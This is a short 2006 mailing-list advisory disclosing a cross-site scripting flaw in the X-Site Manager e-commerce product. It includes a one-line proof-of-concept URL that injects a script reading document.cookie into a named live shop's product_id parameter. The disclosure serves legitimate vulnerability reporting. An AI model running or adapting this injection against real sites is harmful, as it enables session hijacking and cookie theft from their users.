From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, bugtraq@securityfocus.com
Date: Wed, 18 Jan 2006 18:23:28 -0500
Subject: [OSVDB Mods] X-Site Manager featuring X-Site E-Commerce Solution - Cross Site Scripting

X-Site Manager featuring X-Site E-Commerce Solution - Cross Site
Scripting

Vendor URL: http://www.netrix.ltd.uk/

PoC:

http://www.fingertech.co.uk/mp3store/mp3players_details.php?product_id="><script>alert(document.cookie)</script>


Preddy
RootShell Security Group